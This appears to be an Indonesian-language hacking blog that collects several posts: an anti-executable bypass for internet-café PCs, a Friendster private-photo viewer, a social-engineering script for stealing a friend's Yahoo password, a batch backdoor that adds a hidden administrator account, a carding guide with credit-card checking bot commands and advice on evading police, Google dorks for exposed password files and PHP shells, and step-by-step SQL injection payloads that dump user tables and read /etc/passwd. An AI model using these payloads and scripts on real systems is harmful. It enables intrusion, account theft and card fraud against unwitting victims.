Lacak Penjiplakan Postingmu
Posted OnWalah....
Ini anhe bin lucu....
Hehhehe....
Pernah ga postingan loe mrasa dijiplak ????
Hhahaha.....
Nah ini dia nhe Detektifnya...
Nahloh....Dicoba aja dech
Kamu ketahuan.....Huakakak
hehehe
Tembus Anti Exe
Posted Ongw mo coba share tentang cara mengalahkan warnet yang dipasang anti exe, tapi gw cerita dulu ya:
IP warnet gw di blok oleh salah satu game online karena ketauan banyak yang make cheat RF, so gw protek warnet gw dengan anti-exe dengan nama software: antiexecutable, kaya nya nh software satu perusahaan dengan deepfreez.. udah keinstal dan gw coba copy n install berbau .exe ga mau dia..
tapi setelah rasa penasaran cara ngakalin, ga perlu waktu lama untuk nembus nya, pake logika dikit, yang ga bisa dicopy kan .exe
nh cara nya:
1. ganti .exe nya, misal setup.exe ganti menjadi setup.bin
2. copy aj yang ada program di kompi warnet misal ada yang nama nya klite.exe , nah copy setup.bin ke folder yang ada klite.exe
3. delete klite.exe,
4. truz ganti nama setup.bin menjadi klite.exe
5. yupz selesai..
ini hanya untuk keperluan yang bermanfaat, bukan untuk merusak,
ex: yang ingin menjalankan idm, yang warnet di proteksi dengan anti-exe,
or yang mempunya program untuk tugas aj
Ngembat gambar yang di proteksi oleh spacer
Posted OnDi beberapa website yang ada di zaman sekarang ini,banyak sekali yang menggunakan protection agar gambarnya tidak dapat diambil,ya sangat mengesalkan juga jika gambar yang kita sukai tidak dapat di save,ketika kita save hanyalah sebuah spacer image atau image kosong. Ini bukan lah program yang begitu sulit dipecahkan,ini hanyalah sebuat bahasa pemprograman website. Cara kerja spacer ini adalah menumpuk diatas image yang sebenarnya.
langsung aja juragan di sedottt ampe keluar...
buat para master tinggal senyum
buat nubie,semoga bs jd pembelajaran
http://h1.ripway.com/kingsaint/tutolieur/flickr.exe
Grab(download) video dari youtube dengan source code!!!
Posted OnDaripada kita harus repot pake software, mending pake source code aja
caRa ini Lebih terLihat pRofesionaL,jadi kLo buat beGaya di warnet,ini emang cocok buaT Loe,he,he,
waH udah terlalu panjang niH tuLisannya kayak kereta aPi tut,tut,tut, siapa hendak turun, ke Bandung, Surabaya, beLi karCis jangan nguTang,he,he, cuKup!!!! to tHe poiNt. caRa nya adalah gini. O iya saya menggunakan Browser Opera supaya lebih muDah, dengan bRowser Lainnya tetep bisa cuma ada sdikit banget perbedaan!!!! Okeh Nomor saTu adalah :
Buka situs YouTube.com, caRi viDeo yg anda mau simpen di PC , misalnya:
LaLu tampiLkan Source Code nya dengan cara kLik view -> Source, Like this:
setelah munCuL PageSource nya, cari tuLisan Fullscreen dengan cara kLik Edit -> Find, atau dengan menekan tomboL CTRL + F. Lalu ketik tulisan "Fullscreen" dan tekan Enter. hingga anda teMukan tuLisan "Fullscreen" tersebut, seperti:
di sekeliling tuLisan Fullscreen tersebut ada kode² (pokoknya bukan kode buntut,he,he,) seperti ini misalnya (tergantung Videonya):
watch_fullscreen?fs=1&q=rivers%2520crew%2520trailer%25202008&vq=None&sourceid=
ys&video_id=LxvABm3qmYc&l=328&sk=CA538a1adta3faR390RPDmPTXKES2tZRC&fmt_map=6%2F720000%2F7%2F0%2F0&t=
OEgsToPDskKMsTNQXR8qX8QVdtlxCa-n&hl=en&plid=AARMR_793Y-BcyJwAAAAoAAYAAA&title=Rivers Crew Trailer 2008';
Lalu bLok kode tersebut setelah tulisan watch_fullscreen (dari tanda tanya) hingga sebelum tulisan &title Lalu klik kaNan & pilih Copy.
PerHatikan ini!!! Kopi hanya yg berwarna merah saja :
watch_fullscreen?fs=1&q=rivers%2520crew%2520trailer%25202008&vq=None&sourceid=
ys&video_id=LxvABm3qmYc&l=328&sk=CA538a1adta3faR390RPDmPTXKES2tZRC&fmt_map=6%2F720000%2F7%2F0%2F0&t=
OEgsToPDskKMsTNQXR8qX8QVdtlxCa-n&hl=en&plid=AARMR_793Y-BcyJwAAAAoAAYAAA&title=Rivers Crew Trailer 2008';
Lalu, buka kembaLi jendeLa Video Youtube yg sedang dimainkan. Lalu ubah address bar atau URL tersebut,
dari http://www.youtube.com/watch?v=LxvABm3qmYc
menjadi http://www.youtube.com/get_video
setelah itu kLik kanan pada akhir URL dan pilih Paste & Go. Like this :

Maka akan muncuL kotak Download File dan piLih Save. seperti ini :

Lalu pada kotak Save As, ubaH File Name nya menjadi "NamaVideoNya.FLV" (tanpa tanda kutip,, ingat, ingat, jangan Lupa menambahkan .FLV pada akhir Nama file. & Pada bagian Save As Type, pilih ALL Files atau yg bertuLiskan *.* Lalu kLik Save.
Lihat ini :

seteLah itu akan terbuka jendeLa transfer/download, tunggu proses itu dengan sabar, kaLo udah selesai kayak giNi neh :

Nah Video tadi siaP di gunakan sebagaimana mestinya...
Hack Private Photo Friendster
Posted OnPada penasarn kan kalo temen ato pacar anda kok masang private photo di friendster. Kalo begitu anda senasib dengan saya. Setelah iseng iseng nyari sesuatu di google, lah kok nongol artikel tentang hack private photo friendster. Awalnya sih ak pikir ini trik yang jadul itu. Tapi setelah diperhatikan lagi lho kok bulan september tahun 2008>
Siap beraksi deh..awalnya dapat artikel yang cara bukanya pake program. Apalagi untuk buka programnya harus download file sebesar 20 MB, yah terpaksa deh go to warnet..Masak download 20 MB pake internet gratisannya Fren yang tiap 30 detik putus..mungkin sampe lebaran baru selsai downloadna. Sip abis download tu program balik lagi ke rumah. Pas di coba la kok gak jalan, mungkin gara2 internet putus sambung ala fren yang aku pake. Tapi ak blm nyerah..nyari lagi di google tentang cara menggunakan tu program..eeh malah nongol cara yang lebih gampang.Ya udah ak kasi triknya:
1. Pikirin target yang akan jd korban
2. NAh kalo dah ketemu..buka FS kamu.
3. Masuk ke FS nya korban.
4. Nah liat di adress bar..alamat URL si korban ex:http://profiles.friendster.com/14734479
5. copy deret nomor terakhir di urlnya kayak di atas tu jadinya 14734479
6. Sekarang buka situs http://www.manismadu.com/kampret/.
7. Tinggal masukin nomor yang didapat tadi, contoh tadi 14734479.
8. Nah setelah enter akan muncul gambar 2 album, nah untuk private photo ditandai dengan gambar gembok. Klik aja.
9. Der..gambarnya muncul..!!!.
kalo link di atas ga bisa coba yang ini..tapi gak disarankan bagi yg lagi puasa ada godaan godaan di bagian atas :
http://www.rasa-rasa.com/mambot/fs.php
http://www.rasa-rasa.com/mambot/friendster.php
Hack Password Yahoo Dengan Chatting Menggunakan Yahoo Messenger
Posted Onni namanya Teknik sosial engineering..
Caranya :
1. Chating sama temen kamu pake YM
2. Ngobrol panjang lebar, sampe keliatan akrab..
3. Nah kalo sudah dirasa akrab, siap beraksi.
Ini namanya Teknik sosial engineering..
Caranya :
1. Chating sama temen kamu pake YM
2. Ngobrol panjang lebar, sampe keliatan akrab..
3. Nah kalo sudah dirasa akrab, siap beraksi.
4. Haker: hey kamu tau gak yahoo punya fitur rahasia baru lo..
Korban : Kasi tau dunk...
Haker : Sekarang kamu liat ya tulisan apa yg aku kirim..
Kamu ketik aja dengan karakter *******.
Haker : Udah liat tulisanku blm?
Korban : lho kok isinya cuma *******.
Haker : Nah itu rahasia terbarunya yahoo.. Yang tadi aku tulis itu password emailku.
Korban : masak sih ..aku coba ya.
Trs dia kirimin passwordnya buat kamu . Kena deh...
Echo Backdoor
Posted Onrem *echobackd00r.bat
rem *Maret 2004 - backd00r untuk XP && 2000
rem *dibuat untuk mempermudah menciptakan account admin
rem *Kombinasikan dengan SPLOITS untuk mendapatkan Account admin ex: kaht2
rem *atau masuk ke pc yang masih default dengan disket :P baca eksploits lokal
rem *MULAI.
@echo off
PROMPT $P$G
cls
Color 87
GOto iklan
:setting
rem *ganti USER dan PASS
set USER="backdoor"
set PASS="password"
if %USER%=="backdoor" Goto gagal else GOto proses
:proses
rem *masuk ke perintah tuk nambahin user + passwordnya
net user %USER% %PASS% /add
net localgroup Administrators %USER% /add
net localgroup Users %USER% /delete
cls
echo.
echo Account %USER% dengan password %PASS% telah berhasil di buat!
color 70
EXIT
:iklan
rem * just a banner from me :) , bisa di hilangkan :p
echo.
echo ###############################################################
echo # #
echo # Echobackd00r #
echo # created && tested by y3dips with XP OS #
echo # greetz to :the_day for idea, moby, z3r0byt3,comex, *PUJI #
echo # note: ubah USER dan PASS #
echo # #
echo ###############################################################
echo.
echo tekan ENTER !!!
pause>nul
Goto setting
:gagal
echo.
echo edit file echobackd00r.bat dan ubah USER dan PASSnya
echo.
Senjata Seorang Carder
Posted OnTentu kalian udah nggak asing lagi dengan istilah yang satu ini,carder adalah istilah yang diberikan oleh hacker sejati untuk pencuri kartu kredit. Kali ini kita akan bahas soal carder ini.
Tapi ingat!!! yang aku tulis ini,hanya bersifat ilmu pengetahuan.aku tidak bertanggung jawab jika kalian berurusan dengan pihak kepolisian. Aku sarankan jika kalian mendapat cc jangan beli barang.
Mari kita mulai......
1.masuk ke MIRC
dari MIRC kalian join ke channel ini :
#CCPOSTS
#THACC (Dulu namanya #thecc)
sebenarnya masih banyak channel yang lainnya tapi aku kasih dua aja yaa!!
2.setelah join ke #ccpost kamu ketik perintah !commands dan kemudian akan muncul di layar perintah perintah yang bisa kamu gunakan.
3.!chk cc number valid /!chk 1234567890 1202 untuk mengetahui kartu tsb bisa di gunakan atau tidak.
4.!cvv2 cc number/ !cvv2 1234567890 untuk mengetahui nomor identitas kartu tsb (card ID)
5.!proxy
untuk mengetahui nomor proxy dan port yang bisa kamu gunakan untuk mengelabui ISP.
6.!order.log
untuk mengetahui nama,alamat dan cc number seseorang.
ini nih cuplikannya :
#ccposts
*** Now talking in #ccposts
*** Topic is '..:: Welcome To #CCPOSTS | !Chk [OFF] !Commands [ON] !Cvv2 [ON] | Also Idle In #Dont.whois.me.bitch and get Aop | +o/+v Verify First| /server xdirc.d2g.com -> Free BNC: /server portatech.net 21500 xdirc'
*** Set by ^XDIrc^ on Thu May 09 02:04:28
-CCard-Chk-Bot- Tired Of Using Dallnet FFoor Checking CC's ? Try X-Niatites 5.01 -- http://mi5.ausgamers.com/xns501.exe (Win ME untested & 24 Valid CC's Included) !cvv2 5437000105070603 !commands
*** Quits: MIHUTESCU (~mihut@80.97.26.67) (Client closed connection) Er0sake` , <> is Master > cvv2 : -> 074 <-, by : SL[a]TkiS , #DaCc
-listen2rap- SL[a]TkiS's command llist iiss as following: !country Country-Name, !state State-Name, !bank cc-Number, !bnc, !order.log, !cardable, !proxy, !unicode, !cvv2 ccNumber - -=. SL[a]TkiS addon version 4.0, get it at www.sthost4u.net/Programs/slatkis_addon_4.0.zip , #DaCc =- <@^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?? ?
*** Joins: ^tyty^ (BaCk0ff@max227.idx.com.au)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: )
* DaLinuX i have root i need cc msg me for trade
!chk 373216942923005 0802
#thacc
*** Now talking in #thacc
*** Topic is 'We are not responsible for any actions that non-op's perform or any actions against DALnet policy that may done at the main chan}}[Type: !commands ] ||GSD's site: www.TheCC.biz || [ Join #CCpower ] [new command by GSD > !phone < only when MR^all' is here] y2y = GSD'
*** Set by GSD on Fri May 03 02:11:11
!proxy
*** Parts: fc4 (~umik_o@203.147.50.12)
*** Joins: fc4 (~umik_o@203.147.50.12)
<^Enhance^> ?? Request ?? Info?Auth.net Merchant Account - I have Virgins / Cvv2 / eBay Seller Accounts / Proxy / XXX / Cardable Sites / High Limit CCs -- I Ver. First. NewBs & Ripperz Piss Off? ? ?? ?
*** Quits: ALICE22 (kozxgy@189.Red-80-34-233.pooles.rima-tde.net) (Quit: IRcap 7.1 http://www.ircap.net !)
*** Quits: ^tyty^ (BaCk0ff@max227.idx.com.au) (Quit: ) !xlogin 373216942923005 0802
*** e_KiNGHT-[Away] is now known as Guest53360
How I can see my card is valid
* DaLinuX i have root i need cc msg me for trade
Jelas ??!
Sekedar saran aja, pakai alamat rumah kontrakan/kost, jadi setelah barang yang didapat sampai, segera kabur dari rumah tersebut, hheeeehe, biar gak dilacak
Google Hacking
Posted OnBanyak sekali website yang berguguran dengan memanfaatkan pencarian pada
Google untuk menemukan targetnya. Seperti Worm Santy yang melakukan
defacing secara massal dengan memanfaatkan Google. Dalam hitungan hari
ribuan website tampilan utamanya berubah.
Tulisan ini dibuat untuk memahami bagaimana melakukan pencarian yang baik
dengan menggunakan Google. Pada bagian akhir juga terdapat trik-trik dan
keyword yang sering digunakan untuk melakukan pencarian file dan juga
bagaimana mencari target dengan memanfaatkan Google.
--- 01 // Penggunaan Dasar -----------------------------------------------
- Google tidak "case sensitive".
Keyword: linux = LINUX = LiNuX
Akan menghasilkan hal yang sama
- AND: Secara Default Google menggunakan keyword and.
Keyword: menjadi hacker
Hasilnya pencarian akan mengandung kata "menjadi" dan "hacker"
- OR: Digunakan untuk menemukan halaman yang setidaknya berisi salah
satu dari keyword. Note: OR dituliskan dengan huruf besar semua.
Keyword: hacker OR cracker
Hasilnya pencarian akan mengandung kata "hacker" atau "cracker"
- +: Google akan mengabaikan pencarian dengan kata-kata umum seperti
"how" dan "where". Jika kata-kata umum ini begitu penting, anda
bisa menambahkan "+" didepan keyword tersebut.
Keyword: hacker how ==> Kata "how" akan diabaikan
Keyword: hacker +how ==> Kata "how" akan diikutsertakan
- -: Tanda minus "-" bisa digunakan untuk mengecualikan kata-kata
tertentu dalam pencarian. Misal kita ingin mencari kata
"linus tanpa linux", kita bisa menggunakan "linus -linux"
- *: Google tidak mendukung pencarian * sebagai pengganti huruf.
Misalkan kita ingin mencari dengan kata depan menja*
Google tidak mencari kata "menjamu", "menjadi", "menjalar", dll
Google akan menghasilkan pencarian hanya yang mengandung kata
"menja".
Tetapi google mendukung penggunaan * dalam pencarian kalimat.
Keyword: "menjadi * hacker"
Hasilnya pencarian dapat menghasilkan "menjadi seorang hacker",
"menjadi white hacker", dll.
- "": Dapat digunakan untuk mencari kata yg lengkap.
Keyword: "menjadi hacker"
Hasilnya pencarian akan mengandung kata "menjadi hacker"
- ?: Dapat digunakan untuk mencari pada direktori Google
Keyword: ?intitle:index.of? mp3
--- 02 // Operator Spesial -----------------------------------------------
-- Contoh hasil pencarian --
Google --> Judul
... Language Tools. Ways to help with tsunami relief \
Advertising Programs - About Google ©2005 Google - > Deskripsi
Searching 8,058,044,651 web pages. /
www.google.com/ - 3k - 5 Jan 2005 --> URL
-- Contoh hasil pencarian --
- intitle: Untuk mencari kata-kata dari judul suatu halaman web.
Keyword: intitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman "Admin" dengan
deskripsi "Administrasi"
- allintitle: Untuk mencari kata-kata dari judul halaman web
secara lengkap.
Keyword: allintitle:Admin Administrasi
Keyword tersebut akan mencari judul halaman yang mengandung
kata "Admin" dan "Administrasi"
- inurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: inurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dengan deskripsi "Administrasi"
- allinurl: Digunakan untuk mencari semua URL yang berisi kata-kata
tertentu.
Keyword: allinurl:Admin Administrasi
Keyword tersebut akan mencari URL yang mengandung kata "Admin"
dan "Administrasi"
- site: Untuk mencari dalam suatu situs tertentu saja
Keyword: site:echo.or.id
Semua pencarian hanya berdasarkan site "echo.or.id"
- cache: Ketika Googlebot mengindeks suatu situs, google akan
mengambil snapshot dari semua halaman yang telah terindeks.
Operator ini membantu melihat halaman-halaman yang telah
dicache.
Keyword: cache:echo.or.id
Misalkan site aslinya sudah tidak aktif, anda tetap dapat melihatnya
pada snapshot/cache yang disimpan oleh Google.
- define: Operator ini digunakan untuk mencari definisi dari frasa
tertentu. Semua kata yang diketik setelah operator ini akan
diperlakukan sebagai satu frasa.
Keyword: define:hacker
- filetype: Jika kita mencari jenis file tertentu yang berisi informasi
yang anda inginkan kita bisa menggunakan operator ini.
Keyword: "hacker" filetype:pdf
Sampai tulisan ini dibuat google support tipe file
# Adobe Portable Document Format (pdf)
# Adobe PostScript (ps)
# Lotus 1-2-3 (wk1, wk2, wk3, wk4, wk5, wki, wks, wku)
# Lotus WordPro (lwp)
# MacWrite (mw)
# Microsoft Excel (xls)
# Microsoft PowerPoint (ppt)
# Microsoft Word (doc)
# Microsoft Works (wks, wps, wdb)
# Microsoft Write (wri)
# Rich Text Format (rtf)
# Shockwave Flash (swf)
# Text (ans, txt)
Ref: http://www.google.com/help/faq_filetypes.html
- link: Untuk mencari tahu berapa banyak link ke suatu situs, kita bisa
menggunakan operator link.
Keyword: link:www.google.com
- related: Untuk mencari halaman yang isinya mirip dengan URL tertentu.
Keyword: related:www.google.com
--- 03 // Manipulasi URL Google ------------------------------------------
> And bisa mengganti interface google dengan mengganti variabel hl
(default google hl=en => bahasa inggris)
Misalkan kita mengubah interface-nya menjadi bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=id&lr=&q=site%3Aecho.or.id&btnG=Search
> Anda dapat mengganti hasil pencarian hanya pada bahasa tertentu. Hal ini
dilakukan dengan modifikasi variabel lr.
(default google lr=lang_en => bahasa inggris)
Misalkan kita hasil pencarian hanya bahasa Indonesia.
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=lang_id&q=site%3Aecho.or.id&btnG=Search
> Secara default google akan menampilkan 10 site perhalaman. Anda dapat
mengubahnya secara langsung melalui URL-nya, dengan menambahkan variabel
num pada URL :D
Penggunaan num antara 1-100
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?num=100&hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
> as_qdr=mx: merupakan variabel lainnya yang dapat digunakan. Variabel ini
digunakan menentukan hasil berdasarkan bulan. x antara 1-12
Ex:
http://www.google.com/search?hl=en&lr=&q=site%3Aecho.or.id&btnG=Search
Hasil modifikasi URL
http://www.google.com/search?hl=en&lr=&as_qdr=m1&q=site%3Aecho.or.id&btnG=Search
> safe=off: arti dari variabel ini filter "SafeSearch" dimatikan. "SafeSearch"
untuk memfilter hasil pencarian sexual.
Dengan pengetahuan di atas anda dapat membuat sendiri form Google di komputer
sendiri. Sehingga tidak perlu lagi mengunjungi http://www.google.com terlebih
dahulu (kecuali anda menggunakan brwoser yang support google secara built-in
atau menggunakan Google Toolbar). Dengan melakukan ini kita bisa menghemat
bandwidth ke luar negeri :D
Karena bandwidth di Indonesia mahal ........
Contoh script google.html lengkap dengan varabielnya.
--- BOF google.html ---
--- EOF google.html ---
Anda tinggal menghilangkan Variabel yang tidak anda inginkan atau
menambahkan apapun disana. Semuanya terserah kepada anda :D
Berikut merupakan script default pencarian google.
--- BOF google.html ---
--- EOF google.html ---
Google masih terus dikembangkan. Untuk melihat apa yang sedang
dikembangkan Google. Anda bisa ke http://labs.google.com
--- 04 // Tips & Tricks --------------------------------------------------
Dari dasar-dasar dan spesial operator tersebut anda bisa mencampurkan
operator-operator tersebut.
Ex:
- Keyword: site:echo.or.id, menghasilkan semua site echo.or.id. Kemudian
anda bisa mencoba keyword: site:echo.or.id hacker, akan menghasilkan
semua site echo.or.id yang mengandung kata hacker.
Kita juga dapat melakukan pencarian secara spesifik melalui google.
Untuk melakukannya anda dapat ke site berikut:
- http://www.google.com/bsd
- http://www.google.com/mac
- http://www.google.com/linux
- http://www.google.com/microsoft
- http://www.google.com/univ/education
Berbagai trik keyword pada Google:
parent directory books -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory /appz/ -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory DVDRip -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory video -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory Gamez -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
parent directory MP3 -xxx -html -htm -php -shtml -opendivx -md5 -md5sums
intitle:index of intitle:mp3 -html -htm name size
intitle:index of intitle:video -html -htm name size
intitle:index of intitle:cgi-bin passwd -html -htm name size
intitle:index of intitle:cgi-bin password -html -htm name size
inurl:"admin.mdb" -html
inurl:"password.mdb" -html
inurl:"data.mdb" -html
"phpMyAdmin" "running on" inurl:"main.php"
intitle:"PHP Shell" "Enable stderr" php
Masih banyak lagi keyword yang bisa ditemukan disini [5] :D
--- 05 // Referensi ------------------------------------------------------
[1] http://www.google.com/help/basics.html
[2] http://www.google.com/help/features.html
[3] http://www.google.com/help/refinesearch.html
[4] http://www.google.com/help/interpret.html
[5] http://johnny.ihackstuff.com/
[6] O'Reilly - Google Hacks
Membuat Php ProxY
Posted OnArtikel penggunaan proxy dimaksudkan untuk melewati beberapa situs yang diblok, intinya untuk jumping dari ip asli kita ke ip lain. Tehnik yang dilakukan bermacam-macam untuk melewati blokir Ip dari membuat proxy sendiri lewat shell target, memakai software proxy hingga memakai proxy yang berbayar, penulis akan mencoba memakai tehnik suntik dari shell target lewat script php proxy, btw semua untuk pembelajaran semata jangan disalah artikan.
Untuk memakai script ini ga susah hanya harus dapat shell target and upload scipt itu.
Langsung aja, penulis asumsikan anda susah dapat target, masuk ke target anda
extract file phpproxy.zip di commands shell dengan perintah unzip phpproxy.zip
kemudian arahkan URL yang terdapat file yang tadi anda upload script phpproxy
Sudah berhasil kita upload script phpproxy, kemudian cek Browser kita tanpa phpproxy
Arahkan Browser anda di URL proxy yang kita buat
Selamat Mencoba
Php Injection In Action
Posted On== WEB HACKING IN ACTION PART I==-
PHP - MYSQL : SQL INJECTION
—————————-
(Dumping MySQL Database)
CREATE TABLE `userlist` (
`id` tinyint(6) NOT NULL auto_increment,
`username` varchar(28) NOT NULL,
`status` varchar(28) NOT NULL,
`password` varchar(48) NOT NULL,
`creation_date` timestamp NOT NULL default CURRENT_TIMESTAMP on update CURRENT_TIMESTAMP,
`nama_lengkap` varchar(128) NOT NULL,
`status_id` tinyint(6) NOT NULL,
PRIMARY KEY (`id`)
) ENGINE=MyISAM DEFAULT CHARSET=latin1 AUTO_INCREMENT=7 ;
–
– Dumping data for table `userlist`
–
INSERT INTO `userlist` (`id`, `username`, `status`, `password`, `creation_date`, `nama_lengkap`, `status_id`) VALUES
(1, ‘anxx’, ‘administrator’, ‘8a1465884c097cfa30e332c57exxxxxx’, ‘2007-05-15 21:18:08′, ‘anxxx nightlogin’, 1),
(2, ‘kaxxxx’, ‘operator’, ‘8a1465884c097cfa30e332c57xxxxxx’, ‘2007-05-04 21:18:31′, ‘kaxxxx poseidon’, 2),
(3, ‘bxxx’, ‘operator’, ‘b3f85374ebbdb228c0ad76cd6axxxxxx’, ‘2007-05-04 16:51:32′, ‘Bxxx Erlangga’, 2),
(4, ‘haxxx’, ‘operator’, ‘daa526517139536f056efbb8exxxxxx’, ‘2007-05-04 20:13:31′, ‘Haxxx pekok’, 2);
#############
# SEKENARIO 1
#############
nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;
?>
Eksploitasi:
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′ and ‘a’='a
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′ union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=-1′%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=1′%20union%20select%201,1,1,1,1,1,load_file(’/etc/passwd’)%20into%20outfile%20′/var/www/users/kaiten/PENTEST/pwdx.txt’/*
#############
# SEKENARIO 2
#############
nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;
?>
Eksploitasi:
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 and 1=0
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2 union select 1,1,1,1,1,1,1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=-1%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=1
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt’
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln2.php?id=1%20union%20select%201,1,1,1,1,1,load_file(’/etc/passwd’)%20into%20outfile%20′/var/www/users/kaiten/PENTEST/pwd.txt’
#############
# SEKENARIO 3
#############
nama_lengkap.”
“;
echo “Username : “.$row->username.”
“;
echo “Status :”.$row->status.”
“;
echo “\n”;
?>
Eksploitasi:
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=1′)%20and%201=1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′) union select 1,1,1,1,1,1,1/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln3.php?id=-1′)%20union%20select%201,username,concat(char(112,97,115,115,119,111,114,100,58),password),1,1,1,1%20from%20userlist%20where%20id=2/*
http://172.16.11.xx/~kaiten/PENTEST/sqlvuln.php?id=2′)%20union%20select%20*%20from%20userlist%20into%20outfile%20′/var/www/users/kaiten/PENTEST/db.txt’/*
Sql Injection Ver. 5
Posted On1.) Cek Kutu
Misalkan kita mendapatkan target
http://www.target.com/news.php?id=5
Sekarang kita test ada kutunya g tuh website dengan menambahkan di url’
contoh http://www.target.com/news.php?id=5′
maka akan muncul error
“You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right etc…”
Atau Yang mendekati
Itu berarti kita bisa gunakan Sql Injection
2).
Mencari nomor dari kolom
Untuk mencari nomor dari kolom kita menggunakan perintah ORDER BY
Kita melakukan perurutan nomor sampai ada error
http://www.target.com/news.php?id=5+order+by+1/* <– no error http://www.target.com/news.php?id=5+order+by+2/* <– no error http://www.target.com/news.php?id=5+order+by+3/* <– no error http://www.target.com/news.php?id=5+order+by+4/* <– error (kita akan mendapatkan pesan seperti Unknown column ‘4′ in ‘order clause’ atau sesuatu seperti itu…ya gitu degh ) Berarti kita mendapatkan kolomnya, ya itu 3, karena di 4 error.
Sedikit penjelasan, dalam penggunaan ORDER BY kita mencari pertemuan dimana website itu menjadi error dan tidak, setelah itu mendapatkannya, kita ambil yg tidak erorr terakhir sebelum keluar error.
3). Menggunakan fungsi UNION
Dengan menggunakan UNION kita dapat memilih lebih banyak data dalam satu statemen sql.
Jadi kita mendapatkan
http://www.target.com/news.php?id=5+UNION+SELECT+1,2,3/* (kita telah menemukan bahwa nomor dari kolom-kolom adalah 3 di dalam bagian 2)
Sekarang lihat pada artikel, artikelnya akan berubah jadi nomor 1 atau 2 atau 3 atau keluar semuanya, itu lah gunanya UNION
4). Check versi dari MySQL
http://www.target.com/news.php?id=5+union+select+1,2,3/*
NOTE: jika /* tidak bisa atau terjadi error, coba dengan –
ini merupakan suatu komentar penting bagi query kita untuk bekerja dengan baik.
Misalkan kita mendapatkan nomor 2 di dalam tampilan, sekarang kita cek verisinya
kita buang nomor 2, ganti dengan version() atau @@version nanti akan mendapatkan seperti 4.1.33-log atau 5.0.45 atau yang mendekati.
Contoh tampilan : http://www.target.com/news.php?id=5+union+select+1,@@version,3/*
Jika kamu mendapatkan error “union + illegal mix of collations (IMPLICIT + COERCIBLE) …”
Yang kita butuhkan adalah fungsi convert()
contoh :
http://www.target.com/news.php?id=5+union+select+1,convert(@@version+using+latin1),3/*
atau dengan hex() dan unhex()
contoh :
http://www.target.com/news.php?id=5+union+all+select+1,unhex(hex(@@version)),3/*
dan kamu akan mendapatan versi MySql
5). Mendapatkan table dan nama column
Jika versi MySQL adalah 5 (contoh : 5.0.45, 5.0.51a-community…)
– Mencari Table
Contoh Nomor yang keluar ada 2, jadi kita masukan perintah injekan di nomor 2
http://www.target.com/news.php?id=5+union+select+1,table_name,3+from+information_schema.tables+where+table_schema=database()+limit+0,1/*
Untuk melihat table selanjutnya kita rubah limit+0,1/* menjadi limit+1,1/* lalu limit+2,1/* dst.
Sampai tabel yang dinginkan, contoh table admin
– Mencari Column
Sekarang kita cari column pada table admin
http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=’admin’+limit+0,1/*
Setandarnya bisa menggunakan itu jika quotenya off, tetapi jika quote on nama table harus di encode dengan hexa
admin = 61646D696E
Untuk dapat di baca oleh perintah SQL, harus di tambahakan 0x sihingga menjadi 0×61646D696E< http://www.target.com/news.php?id=5+union+select+1,column_name,3+from+information_schema.columns+where+table_name=0×61646D696E+limit+0,1/*
Untuk melihat colum selanjutnya tinggal merubah limitnya seperti table diatas.
Contoh column yang keluar username dan password
Sekarang kita lihat datanya
http://www.target.com/news.php?id=5+union+select+1,username,3+from+admin/*
Contoh data yang keluar : admin
http://www.target.com/news.php?id=5+union+select+1,password,3+from+admin/*
Contoh data yang keluar : p45w0rd
sekarang kita harus menyelesaikan query biar terlihat bagus
untuk itu kita menggunakan fungsi concat() (merupakan penggabungan strings)
contoh :
http://www.target.com/news.php?id=5+union+all+select+1,concat(username,0×3a,password),3+from+admin/*
catatan : 0×3a, adalah nilai hex dari 3a, sedangkan 0x merupakan tambahan untuk dapat di baca oleh URL
(ada cara lain untuk itu dengan menggunakan, char(58), merupakan dari nilai decimal )
http://www.target.com/news.php?id=5+union+all+select+1,concat(username,char(58),password),3+from+admin/*
